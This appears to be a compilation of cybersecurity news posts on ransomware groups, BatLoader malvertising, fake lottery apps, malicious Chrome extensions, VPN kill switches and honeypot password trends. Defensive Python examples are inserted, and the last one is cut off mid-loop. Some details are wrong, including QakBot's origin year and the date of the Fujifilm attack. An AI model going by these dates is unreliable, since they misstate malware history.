
Active Threat of Black Basta Ransomware on US Companies by QakBot Malware

 


Recently Joakim Kandefelt and Danielle Frankel, researchers at the cybersecurity firm Cybereason, reported that the Black Basta ransomware operation is running a new campaign that targets U.S. companies using QakBot malware. Through this campaign the attackers try to gain an initial foothold and then take over the organization's network. 

The threat actors use Black Basta ransomware as the tool to seize the data on a victim's network or systems. The ransomware targets organizations rather than individuals, and it locks the targeted organization's data with encryption that cannot be undone without the attackers' decryption keys. 

Black Basta ransomware was first observed in April and is considered an outgrowth of the Conti ransomware. It uses the well-tested double-extortion method: confidential information is first stolen from the targeted organization, and the attackers then use that data to pressure the victim into paying a ransom, threatening to publish the information if the demanded ransom is not paid. 

It is worth noting that a Black Basta attack makes visible changes to the victim's desktop: encrypted files are renamed with the ‘.basta’ extension, the desktop background is replaced with a new image, and a new file named “readme.txt” is dropped on the system. The wallpaper image carries a short message directing the targeted users to open that text file. 

The prime target companies of the ransomware are from the U.S., Canada, Australia, and New Zealand. 

QakBot, used in the latest Black Basta campaign, dates back to 2019 and has been heavily used in many other ransomware attacks, such as the one on Fujifilm Holding Corp in 2020. What makes QakBot so popular with attackers is that once it gains access to the target's network, it also opens a door for the threat actor to deploy further malware. 

A study of the Black Basta campaign found that the operators behind it are highly skilled and well organized. In one attack under this campaign, the malicious actors obtained access to the victim's network domain within two hours and were able to deliver the ransomware in just twelve hours. 

Cybereason has warned organizations to be aware of these attacks and to protect themselves against them, and it lists several precautionary measures. First, companies should be aware of and prevent infections by Black Basta and QakBot; second, Cybereason customers should enable variant payload protection and block vulnerable users and sources. 

Additionally, every organization should spot network connections that seem malicious. Resetting Active Directory access is also advised by Cybereason.

Understand BatLoader Malware and its Working


BatLoader follows the common practice cybercriminals use to get the maximum return from their victims: they prefer to target large organizations, companies, or firms rather than individuals, because the payoff from attacking a firm is far larger than from attacking an individual.

Researchers at VMware Carbon Black stated in their research that the operators of BatLoader are using a dropper to spread a variety of malware tools onto the target's system, including a banking Trojan, an information stealer, and the Cobalt Strike post-exploitation toolkit. 

The researchers at VMware also stated that “the threat actors utilize search engine optimization (SEO) poisoning to lure users to downloading the malware from compromised websites.” 

The research highlighted the similarity of BatLoader with Conti ransomware. The team at VMware found that some attributes in BatLoader's attack chain were similar to past incidents in Conti ransomware. 

Mandiant, a subsidiary of Google, has also pointed out the similarities in the techniques employed by BatLoader and Conti. However, the team at VMware clearly stated that there is no link to Conti in the origin of the BatLoader. 

VMware's Carbon Black MDR team disclosed that there have been 43 successful BatLoader attacks in the past 90 days. There were also unsuccessful cases in which the operators delivered the initial payload but the victim never executed it, so no harm resulted. In a further report, the team gave the number of affected organizations and their sectors: five companies in manufacturing, seven in financial services, and nine in business services. There were also numerous attempts in the education, IT, healthcare, and retail sectors. 

BatLoader’s process of infecting the target’s system 

BatLoader's infection process starts by bundling the malware inside Windows MSI installers for software such as TeamViewer, LogMeIn, and AnyDesk. 

The criminals then buy search adverts that direct victims to look-alike websites such as logmein-cloud.com. These paid adverts appear at the top of the results page when users search for software such as Zoom or AnyDesk. 

When victims follow the adverts, download the software, and execute it, their system is opened up to the threat actors. 

BatLoader is particularly dangerous to businesses because it is only semi-automated: a person or group of people, rather than additional code, directs it. It uses “living off the land” techniques to distribute more malware. 

A “living off the land” attack means that once the malicious actors have control of a system, they use software already present on it, such as Windows PowerShell and scripting tools, to run commands and administer the system without installing any additional malware. 

The researchers concluded that BatLoader is all the more dangerous because, after a link containing BatLoader is installed and executed, it also downloads and installs the banking malware and the information stealer. In addition, BatLoader can discover other connected networks and install remote monitoring and management tools to reach every connected system. 

Even with advances in cybersecurity technology, BatLoader and similar threats show a clear need for better tools and knowledge to detect the source of such threats and block their spread. Given the regular emergence of new threat vectors, the changing threat landscape, and the demand for up-to-date defenses against these attacks, taking an online course to gain cybersecurity knowledge is also a sensible way to reduce the chance of losses from cyber-attacks.

Faux Kerala Lottery Tickets Are Now Being Sold on Google Play

 


The Directorate of Kerala State Lotteries is being impersonated in the Google Play Store by dubious apps named 'Kerala Lottery Online' and 'India Kerala Lottery', cybersecurity researchers warned on Tuesday at the Kerala Lottery Online conference. 

The two Google Play Store applications have been downloaded over one million times. They impersonate the Kerala lottery, which is sold offline, by offering it in an online form, and that is how they came to exist in the Google Play Store. 

In a recent report, the AI-driven cyber-security firm CloudSEK reported that the vast majority of campaigns were spread via referral links. 

On the referral link's landing page, the threat actors state that 5 percent of the winning amount will be shared among all users of the referral link, along with a free entry into the prize draw for anyone using it. 

Kerala lottery has become one of the most popular lottery games in the world. Threat actors have taken advantage of its popularity by creating apps and websites offering lottery tickets and conducting lotteries. However, these lotteries were outlawed by the Kerala government, according to researchers at CloudSEK. 

During the fraudulent campaign, threat actors impersonated government agencies and created fake ads appearing on major social media platforms from accounts with a following of more than 200,000 followers to prove legitimacy. 

The makers of the dubious apps also used the logos of Kerala State Lotteries, Kerala State, and the National Informatics Centre. The Kerala Lottery Department states that the state sells only paper lottery tickets and prohibits online sales, security researchers reported. 

Both the Kerala Lottery Online and India Kerala Lottery apps were found to display the same privacy policy and similar information while operating under different names. 

CloudSEK's analysis notes that the developer contact section of the apps lists the email addresses OnlineKeralaLotto@gmail.com and Sanjaykhankerala@gmail.com. CloudSEK points out that these addresses indicate the apps are not operated by the government entity. 

There are several permissions that the applications ask for, and among them is permission to install packages. 

Numerous Telegram groups, YouTube videos, Facebook posts, and Twitter posts were promoting the scam apps. 

The researchers stated, "Several websites have also been created to give legitimacy to these apps and promote them to make them appear legitimate".

Police Arrests A Suspect Over Election Vote Tampering


Suspect found tampering with elections 

The Pueblo Police Department has arrested a suspect in connection with a suspected case of voting machine tampering at the Pueblo County election headquarters about an hour before the polls closed on June 28, 2022. 

31-year-old Richard Patton from Pueblo was arrested Thursday morning on account of election tampering and cybercrimes. 

As per state records, Patton is a registered Democrat. Pueblo Police Department has assured the community that all voter security measures were followed to protect the voting process and make it successful. 

Police Department assures no inform

No information has been compromised, and the investigation is ongoing. 

"Colorado law requires that tamper-evident seals are affixed to voting equipment under strict security requirements, including a chain of custody of election officials. Nobody else used the machine after Patton. The voting machine was taken into evidence, as well as security camera footage from that evening," said Pueblo Chieftain. 

What does the law enforcement report say?

Pueblo PD and Pueblo County Sheriff's Office reports indicate that at 6 pm on election night, Patton went to the elections department's downtown office to vote in person. 

All registered Colorado voters are sent ballots by mail; however, one can also cast a vote on in-person machines at registered sites. 

Election workers told the police department that Patton asked them about the security arrangements before casting a ballot. 

Patton dropped off his ballot before leaving the office, and records show that his ballot was cast. 

Soon after he left, an election worker went to clean the machine as per the covid protocols. 

The worker found an error code on the display of the machine Patton had used and informed supervisors. 

The Pueblo Chieftain reports:

"Drake Rambke, the election supervisor dispatched to Pueblo County after thousands of incorrect primary ballots were mailed to some Pueblo voters, told law enforcement that evening that he wasn’t sure if a USB device had been plugged into the machine, but multiple election workers said the seals on the voting machines had been tampered with."




The RCE Vulnerability in ConnectWise Has Been Resolved

 


As part of the ConnectWise Recover and R1Soft Server Backup Manager (SBM) secure backup solutions, ConnectWise has released security updates that address a critical vulnerability within those products. 

In an advisory published today, the company describes the flaw as an injection vulnerability: special elements in output are not adequately neutralized before being passed to a downstream component. 

The affected software is ConnectWise Recover (earlier versions of the product) and R1Soft SBM versions 6.16.3 and earlier. 

Several security researchers have reported that this is a critical vulnerability that could expose confidential information or allow attackers to execute code remotely using the vulnerability.

ConnectWise also categorized this as a high-priority issue, meaning that it may be exploited in attacks or is at high risk of being targeted in the wild if it is not addressed immediately. 

According to a report from Huntress Labs, its researchers rediscovered and expanded on the vulnerability originally found by Code White security researcher Florian Hauser. Huntress Labs CEO Kyle Hanslovan says the flaw could be exploited to push ransomware to thousands of R1Soft servers exposed to the Internet. 

Approximately 4,800 Internet-exposed R1Soft servers may be vulnerable to attack through this RCE bug. According to a Shodan scan, these servers may still be unpatched even though ConnectWise has released fixes for the issue. 

ConnectWise announced that automatic updates have been applied to the affected ConnectWise Recover SBMs (v2.9.9). 

It should be noted that Cryptree users are being advised to upgrade their R1Soft backup manager to the latest release, SBM v6.16.4, released on October 28, 2022, by following the steps detailed in the R1Soft upgrade wiki.

As part of the company's recommendation, all R1Soft backup servers that are impacted should be patched as soon as possible. 

Even though patching critical vulnerabilities is always something that cybersecurity professionals are strongly encouraged to do, they do not think it is wise to do it on a Friday evening, as it can be a potentially disastrous timing decision. 

Malicious actors will compromise Internet-exposed servers, such as websites, to the fullest extent as soon as they discover a vulnerability. 

There is also a tendency for hackers to be especially active on weekends since most IT teams and security teams are away from their computers during these busy times. 

As a result of an end-of-the-week release, it is also more difficult to patch any vulnerable servers before the weekend, potentially exposing more systems for a few days to attack, especially if the release takes place along with a holiday weekend. 

There is a concern that not patching the R1Soft SBM backup solution quickly may lead to a significant security incident. This is because the R1Soft SBM backup solution is a popular tool among managed service providers and cloud hosting providers.

Remove These Malicious Chrome Extensions With 1 Million Downloads

 


A browser extension can enhance your online experience in several ways: translation, unit conversion, spellchecking, shopping, and blocking popup ads are some of the services they provide. Extensions let you customize your browsing and can even alter how websites are displayed. Dark mode is one example of a popular Chrome extension.

It is important to remember that not all extensions are safe. By giving them access to information such as your personal data, you hand them a lot of power. 

Some extensions store this data for convenience, but others use it to track you or launch a cyberattack against your computer. A family of malicious Chrome extensions was recently reported to have been downloaded 1.4 million times since it first appeared.

The cybersecurity firm Guardio Labs reports a newly discovered malicious advertising campaign in which Chrome extensions are used to hijack web searches and embed affiliate links into the other websites you visit.

The company's security researchers dubbed the campaign "Dormant Colors" because all of the malicious extensions offer color customization options for Chrome. The extensions contain no malicious code at install time, which is how they passed Google's security checks and made it onto the Chrome Web Store in the first place. 

Extensions for Google Chrome - Dormant Colors

Following a thorough investigation by Guardio, thirty different versions of these malicious browser extensions were found on both the Chrome and Edge web stores, with more than a million installations altogether. They have been removed from both web stores, as mentioned above, but here is the complete list of the removed extensions:

• Action Colors 
• Power Colors 
• Nino Colors 
• More Styles 
• Super Colors 
• Mix Colors 
• Mega Colors 
• Get colors 
• What color 
• Single Color 
• Colors scale 
• Style flex 
• Background Colors 
• More styles 
• Change Color 
• Dood Colors 
• Refresh color 
• Imginfo 
• WebPage Colors 
• Hex colors 
• Soft view 
• Border colors 
• Colors mode 
• Xer Colors 

Explanation of how to remove Chrome extensions manually 

The malicious extensions listed above have since been removed from the stores, but you may still need to remove them from your browser manually: click the three-dots menu at the top right of Chrome, open the 'More tools' section, and then 'Extensions', where you can remove them permanently.
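Beyond the manual check in the browser menu, a defender can inventory the extension directories of a Chrome or Edge profile and match their manifest names against the Dormant Colors list above. This is an added example, not Guardio's or Google's code; the default profile paths, the made-up extension IDs and the sample layout it builds are constructed for demonstration.

```python
import json
import os
import tempfile
from pathlib import Path
from typing import Iterator, List, Tuple

Entry = Tuple[str, str, str, List[str]]   # (extension_id, version, name, permissions)

# Extension names from the Guardio list above, compared case-insensitively.
DORMANT_COLORS = {n.lower() for n in (
    "Action Colors", "Power Colors", "Nino Colors", "More Styles", "Super Colors",
    "Mix Colors", "Mega Colors", "Get colors", "What color", "Single Color",
    "Colors scale", "Style flex", "Background Colors", "Change Color", "Dood Colors",
    "Refresh color", "Imginfo", "WebPage Colors", "Hex colors", "Soft view",
    "Border colors", "Colors mode", "Xer Colors",
)}


def default_extension_roots() -> List[Path]:
    """Where Chrome and Edge keep unpacked extensions for the default profile
    (assumption: standard install locations; other profiles live alongside)."""
    home = Path.home()
    local = Path(os.environ.get("LOCALAPPDATA", home / "AppData" / "Local"))
    return [
        home / ".config/google-chrome/Default/Extensions",
        home / ".config/microsoft-edge/Default/Extensions",
        home / "Library/Application Support/Google/Chrome/Default/Extensions",
        home / "Library/Application Support/Microsoft Edge/Default/Extensions",
        local / "Google/Chrome/User Data/Default/Extensions",
        local / "Microsoft/Edge/User Data/Default/Extensions",
    ]


def _read_json(path: Path):
    try:
        return json.loads(path.read_text(encoding="utf-8-sig"))
    except (OSError, ValueError):
        return None


def resolve_name(version_dir: Path, manifest: dict) -> str:
    """Store listings localize names as '__MSG_key__'; look the key up in
    _locales/<default_locale>/messages.json, falling back to English."""
    name = str(manifest.get("name", ""))
    if not (name.startswith("__MSG_") and name.endswith("__")):
        return name
    key = name[len("__MSG_"):-2]
    for locale in (manifest.get("default_locale", "en"), "en"):
        msgs = _read_json(version_dir / "_locales" / locale / "messages.json")
        if isinstance(msgs, dict) and isinstance(msgs.get(key), dict):
            return str(msgs[key].get("message", name))
    return name   # unresolved: keep the raw placeholder so it is still visible


def inventory(ext_root) -> Iterator[Entry]:
    """Yield one entry per installed <id>/<version>/manifest.json."""
    ext_root = Path(ext_root)
    if not ext_root.is_dir():
        return
    for ext_dir in sorted(p for p in ext_root.iterdir() if p.is_dir()):
        for version_dir in sorted(p for p in ext_dir.iterdir() if p.is_dir()):
            manifest = _read_json(version_dir / "manifest.json")
            if not isinstance(manifest, dict):
                continue
            yield (ext_dir.name, version_dir.name,
                   resolve_name(version_dir, manifest),
                   list(manifest.get("permissions", [])))


def flag_dormant_colors(entries) -> List[Entry]:
    """Keep only entries whose resolved name is on the Dormant Colors list."""
    return [e for e in entries if e[2].strip().lower() in DORMANT_COLORS]


def build_sample_profile(root: Path) -> None:
    """Constructed profile layout for demonstration: one localized 'Action
    Colors' lookalike and one unrelated extension. The IDs are made up."""
    bad = root / "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" / "1.0.3_0"
    (bad / "_locales" / "en").mkdir(parents=True)
    (bad / "manifest.json").write_text(json.dumps({
        "name": "__MSG_appName__", "default_locale": "en", "version": "1.0.3",
        "permissions": ["tabs", "storage", "webRequest"]}))
    (bad / "_locales" / "en" / "messages.json").write_text(
        json.dumps({"appName": {"message": "Action Colors"}}))
    good = root / "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb" / "2.1_0"
    good.mkdir(parents=True)
    (good / "manifest.json").write_text(json.dumps({"name": "Tab Notes", "version": "2.1"}))


def demo_scan() -> List[Entry]:
    """Build the constructed profile in a temp dir and return the flagged entries."""
    root = Path(tempfile.mkdtemp())
    build_sample_profile(root)
    return flag_dormant_colors(inventory(root))


if __name__ == "__main__":
    for root in default_extension_roots():
        for ext_id, version, name, perms in flag_dormant_colors(inventory(root)):
            print(f"{root}: {ext_id} v{version} '{name}' permissions={perms}")
```

A hit only tells you the name matches; confirm the extension ID against the store listing before removing it, since the campaign re-uses the same names across many IDs.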

Making money by hijacking your browser for ad clicks 

The cybercriminals behind this campaign use ads and redirects to trick unsuspecting users into installing their malicious extensions. It happens when users visit sites that offer videos to play or files to download, and it lets the attackers go one step further and install the malicious extensions. 

The lure sites offer videos to watch or programs to download, but when you click the video or download link you are redirected to another site that requires you to add an extension before you can continue. Clicking either the 'OK' or the 'Continue' button prompts you to install a color-changing extension that, on the surface, seems harmless. 

The problem is that once installed, these extensions redirect users to pages that side-load malicious scripts. Those scripts tell the extensions how to hijack searches and on which sites affiliate links can be inserted to generate affiliate revenue. The creators of the extensions also earn a lot of money from the collected search data, which is sold to third parties for profit. 

The Dormant Colors extensions can also redirect automatically to the same page with affiliate links appended to the URL, rather than sending users to a different page entirely. Whenever anyone makes a purchase on one of these sites, the extension developers receive a commission. 

Guardio, in a blog post, says the malicious extension campaign may spread further over the coming weeks: "As this campaign continues to run, it is shifting domains, generating a wide assortment of extensions, and re-inventing several color-and-style-changing functions you are sure to be able to do without."

It is also worth mentioning that the code-injection technique analyzed here, backed by a large infrastructure for mitigation and evasion, could be used for further malicious activities in the future. 

The most effective way to keep your browser from getting infected by malicious extensions 

The best time to make sure you have an effective antivirus solution installed on your laptop or PC is before you add anything to your browser, especially new extensions. That way you are protected against malware infection and against having your personal information stolen and misused. 

When you install extensions, use only trusted sources such as the Chrome Web Store or the Microsoft Edge Add-ons store. Malicious extensions do slip through the cracks from time to time, but you are still safer installing browser extensions from an official store than from elsewhere on the web.

Also ask yourself whether you really need an extension before installing it: do you need it, or do you merely want it? If an extension seems too good to be true, it probably is and is not worth installing. Check the extensions already in your browser regularly as well. 

Periodically review the extensions installed in your browser and confirm they are still relevant. Delete any you no longer need, and watch for new ones you do not remember adding. Used carefully, browser extensions add features and options that the browser's built-in functionality lacks. 

Kill Switch: Your VPN is Useless Without This Essential Security Feature

 

A kill switch has become an essential VPN security feature. If your virtual private network does not have one, it may be time to look for a new VPN provider. 

If a VPN connection drops for any reason, a kill switch immediately shuts down the user's internet connection. In this crucial role, the kill switch ensures that user data does not leak outside the VPN tunnel or travel online unencrypted, which can be dangerous in many situations. 

Using a VPN, the user’s internet traffic is routed to a secure server at a location of his choice over an encrypted tunnel.  

As a result, the user's IP address changes to that of the server they connect to. This not only allows access to geo-restricted content but also hides the user's original IP address and internet traffic from the ISP, government agencies, threat actors, and anyone else who might threaten their online data.  

Why do VPN disconnections occur? 


Since no technology is error-free, even the best VPNs can have connection drops time and again. VPN disconnection happens for several reasons, some of which are listed below:  

• The user is on a weak or congested Wi-Fi connection, such as a public hotspot in a coffee shop, hotel, or airport. 
• The user switches to a different Wi-Fi network or from Wi-Fi to mobile data. 
• The computer goes to sleep. 
• An antivirus program or firewall on the computer interferes with the VPN connection (in this case, whitelist the VPN software). 
• The user jumps from one VPN server to another, or switches servers so often that they exceed the provider's concurrent connection limit. 
• The user is on the OpenVPN UDP protocol, which is less stable than TCP (switch to TCP if the VPN keeps dropping). 
• The VPN server the user is connecting to is down. 
• The VPN app crashes.  

What if your VPN disconnects without a kill switch? 


If a user's VPN disconnects without a kill switch enabled, the internet connection stays active, exposing the user's true IP address and sending web traffic unencrypted for as long as the disconnection lasts. 

As a result, the user's online activities are exposed, compromising any sensitive personal data they may have been accessing over the VPN. The exposed IP address can also reveal the user's true location. 

This could be problematic if the user is using VPN to access geographically restricted content and for professionals who use a VPN for crucial privacy needs. Using kill switch reduces the risk of such situations. 


How does a VPN kill switch operate? 


When enabled, a VPN kill switch continuously monitors the VPN connection, watching for any change in the user's IP address or network status. If it detects a change in either, it engages immediately and blocks the internet connection. 

After the user reconnects to the VPN or the VPN tunnel reestablishes automatically, the kill switch will then allow the internet to reconnect, while still continuously monitoring the VPN connection.
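The monitor-and-block loop just described, plus the firewall policy it relies on, as an added example that is not part of the original post or any VPN vendor's software. The state machine reacts to the tunnel going down or the egress IP changing; `nft_killswitch_rules` generates an nftables policy for a Linux host assuming an OpenVPN client on `tun0` talking to a server at a constructed documentation-range address. The IPs, the polling sequence and the scenarios are all constructed.

```python
from dataclasses import dataclass, field
from typing import Callable, List, Optional


def nft_killswitch_rules(vpn_iface: str = "tun0", vpn_server: str = "203.0.113.5",
                         vpn_port: int = 1194, proto: str = "udp") -> List[str]:
    """nftables commands for an always-on kill switch on Linux (assumption:
    OpenVPN over UDP on tun0; server address is a constructed example).
    With 'policy drop', anything leaving via the physical NIC is discarded;
    only loopback, the tunnel itself, and the handshake to the VPN server
    (needed to reconnect) are allowed. The 'inet' family covers IPv4 and
    IPv6, so v6 traffic cannot slip past the switch."""
    return [
        "nft add table inet killswitch",
        "nft add chain inet killswitch output "
        "'{ type filter hook output priority 0; policy drop; }'",
        "nft add rule inet killswitch output oifname lo accept",
        f"nft add rule inet killswitch output oifname {vpn_iface} accept",
        f"nft add rule inet killswitch output ip daddr {vpn_server} "
        f"{proto} dport {vpn_port} accept",
    ]


NFT_TEARDOWN = "nft delete table inet killswitch"   # run to lift the block


@dataclass
class KillSwitch:
    """Reactive kill switch as described above: watch the tunnel and the
    egress IP, block everything the moment either changes, and re-allow only
    once the tunnel is back and the egress IP is the VPN server's again."""
    expected_egress_ip: str
    apply_policy: Callable[[str], None]   # receives "block" or "allow"; hook into the OS firewall
    connected: bool = True
    history: List[str] = field(default_factory=list)

    def set_expected_egress(self, ip: str) -> None:
        """Call when the user deliberately changes servers, so the new
        egress IP is not mistaken for a leak."""
        self.expected_egress_ip = ip

    def observe(self, tunnel_up: bool, egress_ip: Optional[str]) -> str:
        """One poll of the tunnel state and the observed egress IP."""
        healthy = tunnel_up and egress_ip == self.expected_egress_ip
        if self.connected and not healthy:
            self.connected = False
            self._apply("block")          # tunnel gone or IP changed: cut everything
            return "block"
        if not self.connected and healthy:
            self.connected = True
            self._apply("allow")          # tunnel re-established: reopen
            return "allow"
        return "noop"                     # state unchanged; keep monitoring

    def _apply(self, action: str) -> None:
        self.history.append(action)
        self.apply_policy(action)


def replay_disconnect_scenarios() -> List[str]:
    """Constructed poll sequence mirroring the disconnect causes listed above;
    returns the action the switch took at each step."""
    applied: List[str] = []
    ks = KillSwitch("198.51.100.77", applied.append)
    polls = [
        (True, "198.51.100.77"),   # steady state on the VPN
        (False, None),             # Wi-Fi dropped: tunnel down, no egress at all
        (False, "192.0.2.10"),     # ISP address now visible: stay blocked
        (True, "198.51.100.77"),   # tunnel re-established: allow again
        (True, "198.51.100.88"),   # egress changed underneath us: block
    ]
    actions = [ks.observe(up, ip) for up, ip in polls]
    ks.set_expected_egress("198.51.100.88")   # user intentionally picked that server
    actions.append(ks.observe(True, "198.51.100.88"))
    return actions


if __name__ == "__main__":
    print(replay_disconnect_scenarios())
    print("\n".join(nft_killswitch_rules()))
```

The reactive switch has a race between the tunnel dropping and the block being applied; the nftables policy has no such gap, which is why most providers implement their kill switch as a firewall rule rather than a monitor.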

Iran’s Atomic Energy Organization Confirms E-mail Hack

 

The Atomic Energy Organization of Iran (AEOI) has confirmed that an unnamed “foreign country” hacked an e-mail server belonging to one of its subsidiaries and allegedly published the information online, according to reports. 

The Iranian hacking group calling itself ‘Black Reward’ said in a statement posted on its Twitter account that it has released the hacked information relating to Iran's nuclear activities. The hackers describe their action as support for the Iranian protesters. 

The protests continue in Iran after the death in September of 22-year-old Mahsa Amini, who reportedly died in police custody after being detained for not following the country's strict Islamic dress code. The violent protests and street clashes have resulted in the deaths of several protesters as well as security force personnel, and hundreds of demonstrators have allegedly been detained. 

A statement published by the Black Reward on Saturday showing support for the protests, read “In the name of Mahsa Amini and for women, life, and freedom.”  

The group threatened to leak the hacked documents on Tehran's nuclear program unless the Iranian state released all the prisoners and people detained in the protests within 24 hours. It also demands the release of political prisoners, and claims to have leaked 50 gigabytes of internal emails, contracts, and construction plans relating to the country's Russian-sponsored nuclear power plant in Bushehr, publishing the files on its Telegram channel. 

According to the statement shared by the hacking group, the released information includes “management and operational schedules of different parts of Bushehr power plant,” passport and visa details of Iran and Russia based specialists working in the power plant and “atomic development contracts and agreements with domestic and foreign partners.” 

The organization's general department of public diplomacy and information, however, dismissed the relevance of the released data, stating that “this move was made with the aim of attracting public attention”. 

“It should be noted that the content in users’ emails contains technical messages and common and current daily exchanges […] It is obvious that the purpose of such illegal efforts, which are carried out of desperation, is to attract public attention, create media atmospheres and psychological operations, and lack any other value,” the organization confirmed.

The TommyLeaks and SchoolBoys Ransomware Gangs Share a Common Enemy

 



New extortion gangs TommyLeaks and SchoolBoys have emerged out of China, attacking companies around the world with dangerous extortion threats. The two are connected in more than one way: there is a catch, as both are part of the same ransomware gang. 

Earlier this month, security researcher MalwareHunterTeam warned of a new extortion gang called TommyLeaks that was trying to extort companies. 

The hacking group claims to have breached companies' networks, stolen data, and demanded a ransom not to leak that data. BleepingComputer recently reported that the ransom demands ranged from $400,000 to $700,000. 

In October, MalwareHunterTeam discovered yet another extortion gang, dubbed 'SchoolBoys Ransomware Gang', which claims to use ransomware to steal data from victims and encrypt their devices as part of its extortion campaigns.

Threat actors steal data during their attacks. However, as of yet, no site with public data leaks is known to have been used by threat actors to leak that data. 

Even though nothing connected the two groups at the time, both used the same Tor chat system for ransom negotiations.

What is even more suspicious about the use of this particular chat system is that it had only ever before been used by the Karakurt extortion group.

BleepingComputer reported this week that TommyLeaks and the SchoolBoys Ransomware Gang are in fact the same extortion group operating under two names.

In a SchoolBoys negotiation chat seen by BleepingComputer, the threat actors appeared to address their victim under the TommyLeaks name while trying to coerce a ransom payment. 

While it is not entirely clear why they use two different names, they may be taking an approach similar to that of Conti and Karakurt. 

As previously reported by BleepingComputer, AdvIntel CEO Vitali Kremez has revealed that Karakurt is a member of the Conti cybercrime syndicate and a member of the DefConti crime family. 

When Conti's ransomware encryptor was blocked during an attack, the hackers extorted the victim using the already-stolen data under the Karakurt name rather than the Conti brand. 

Taking this one step further, since the TommyLeaks/SchoolBoys group uses the same chat system as Karakurt, we may be seeing a rebrand of the Conti offshoot into these newer brands.

While it is too soon to tell if this is what is occurring, the extortion group is one that enterprises need to keep an eye on as they are targeting entities of all sizes.

Data From Honeypots Shows Bot Attack Trends Against RDP, SSH



Rapid7 collected data from its RDP and SSH honeypots over nine months, between September 10, 2021, and September 9, 2022, observing tens of millions of connection attempts in that period. The honeypots, covering both RDP and SSH, were set up over two weeks and captured 215,894 unique source IP addresses and 512,002 unique passwords. Almost all (99.997%) of those passwords can be found in the text file rockyou2021.txt.

The RockYou website was breached in 2009. The attackers found and stole 32 million user accounts stored in cleartext, and an exposed list of 14,341,564 passwords became the original rockyou.txt wordlist. That list was widely used in dictionary attacks and ships with Kali Linux as an aid to penetration testing.

Numerous password lists have been merged into the original over the years, and updated versions keep appearing. One result is the rockyou2021.txt collection, a 92 GB text file containing about 8.4 billion passwords, available for free download as a pre-release on GitHub. 

Rapid7 explains in its report titled Good Passwords for Bad Bots (PDF), "We use the RockYou set of passwords as a source of passwords that attackers could generate and try to see if there was any evolution beyond the use of a password list." 

That 99.99% of the passwords thrown at Rapid7's honeypots appear in this list should come as no surprise, because most of them are very common. Of the 497,848 unique passwords seen in the SSH attacks, only 14 are not in rockyou2021.

Each of those 14 contains the IP address of the honeypot under attack, which Rapid7 says most likely reflects a programming error in the attacker's scanner rather than a deliberate guess.

Only one of the passwords used against the RDP honeypots is missing from rockyou2021: 'AuToLoG2019.09.25', which was nonetheless the thirteenth most common RDP password attempt overall. That is puzzling, but the report notes that malware samples containing the ‘AuToLoG’ string exist. “The samples are classified as generic trojans by most antivirus vendors but appear to have RDP credentials hardcoded into them,” adds the report.

Apart from the SSH scanner mistakes described above and the single AuToLoG password, every password used in these honeypot attacks is in rockyou2021. The attacks hitting honeypots are, as a rule, automated, opportunistic bot attacks that go after weak credentials.

Rapid7's analysis of the attempted passwords found that common, well-known passwords were heavily favoured over less common ones. The top five RDP password attempts were '' (the empty string), '123', 'password', '123qwe' and 'admin'; the top five SSH attempts over the twelve months were '123456', 'nproc', 'test', 'qwerty' and 'password'. All of these, like every other observed password, could have been taken from rockyou2021.

Rockyou2021 is, in the end, a very large wordlist. Random strings of mixed ASCII characters, special characters included, are largely absent from it. It holds about 8.4 billion entries, while the number of possible seven-character strings drawn from the 95 printable ASCII characters is 95^7, roughly 70 trillion; even a randomly generated seven-character password is therefore unlikely to be in the list.

Every additional character of length widens that gap dramatically. The overriding conclusion of Rapid7's analysis is that long, random strings of the kind generated by password managers, which will not appear in any dictionary, are a very strong defence against the opportunistic, bot-driven automated attacks these honeypots see.
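The two checks the analysis above rests on, wordlist coverage of observed guesses per service and the size of the keyspace for a given length, as an added Python example (not Rapid7's code). The log lines, the tiny stand-in wordlist and the honeypot address are constructed for the example; a real run would read the honeypot's authentication log and the full rockyou2021.txt.

```python
"""Wordlist coverage of honeypot password guesses, plus the keyspace arithmetic.
Added example; the log lines, the stand-in wordlist and the honeypot IP are constructed."""
import re
from collections import Counter

# Constructed stand-in for rockyou2021.txt (the real list is ~92 GB).
WORDLIST = {"123456", "password", "admin", "123", "123qwe", "qwerty", "test", "nproc", ""}

# Constructed honeypot records: service, source IP, attempted password.
HONEYPOT_LOG = """\
ssh 203.0.113.5 pw=123456
ssh 203.0.113.5 pw=nproc
ssh 198.51.100.7 pw=test
ssh 198.51.100.7 pw=qwerty
ssh 203.0.113.9 pw=password
ssh 203.0.113.9 pw=192.0.2.50
rdp 192.0.2.10 pw=
rdp 192.0.2.13 pw=
rdp 192.0.2.10 pw=123
rdp 192.0.2.11 pw=password
rdp 192.0.2.11 pw=123qwe
rdp 192.0.2.12 pw=admin
rdp 192.0.2.12 pw=AuToLoG2019.09.25
"""
HONEYPOT_IPS = {"192.0.2.50"}  # constructed address of the honeypot itself

LINE_RE = re.compile(r"^(?P<svc>ssh|rdp) (?P<ip>\S+) pw=(?P<pw>.*)$")


def parse_log(text):
    """Return (service, source_ip, password) tuples; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            records.append((m.group("svc"), m.group("ip"), m.group("pw")))
    return records


def coverage(records, wordlist, service):
    """Number of unique passwords seen for one service and the sorted list of
    those not present in the wordlist (Rapid7's 14 SSH and 1 RDP outliers)."""
    seen = {pw for svc, _ip, pw in records if svc == service}
    misses = sorted(pw for pw in seen if pw not in wordlist)
    return len(seen), misses


def explain_miss(pw, honeypot_ips=HONEYPOT_IPS):
    """Classify an out-of-wordlist guess the way the report did: the SSH
    outliers were the honeypot's own address (a scanner bug), the rest unknown."""
    return "honeypot ip (scanner bug)" if pw in honeypot_ips else "unexplained"


def top_passwords(records, service, n=5):
    """Most frequent guesses for a service, most common first."""
    counts = Counter(pw for svc, _ip, pw in records if svc == service)
    return [pw for pw, _c in counts.most_common(n)]


def keyspace(length, alphabet_size=95):
    """Number of strings of this length over the 95 printable ASCII characters."""
    return alphabet_size ** length


def wordlist_fraction(length, entries=8_400_000_000, alphabet_size=95):
    """Upper bound on the share of random passwords of this length that an
    `entries`-sized list could contain, even if every entry had that length."""
    return min(1.0, entries / keyspace(length, alphabet_size))


if __name__ == "__main__":
    recs = parse_log(HONEYPOT_LOG)
    for svc in ("ssh", "rdp"):
        total, misses = coverage(recs, WORDLIST, svc)
        print(svc, "unique:", total, "not in wordlist:",
              [(m, explain_miss(m)) for m in misses], "top:", top_passwords(recs, svc))
    for n in (7, 12, 20):
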